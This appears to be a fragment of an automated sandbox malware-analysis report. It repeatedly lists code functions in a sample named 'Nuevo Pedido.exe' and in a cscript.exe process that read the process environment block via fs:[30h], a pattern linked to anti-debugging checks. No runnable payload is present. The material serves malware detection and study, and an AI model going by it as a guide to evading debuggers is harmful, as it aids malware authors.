            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A3A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A33540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A714FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A8740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A36C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019D746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A37794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A8070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019B4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019CFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A346A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A80EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A4FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019F8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A6FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A88ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019EA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A6FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019E8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A71608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019BE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_01A7AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019DAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 3_2_019C766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0479746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047AA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04848CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047ABC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048314FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04831C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0484740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0480C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0478849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0479C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_048405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04797D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047B3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047F3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_0477AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_047FA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04783D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04828DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04772D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04840EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04787E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04831608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047876E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]
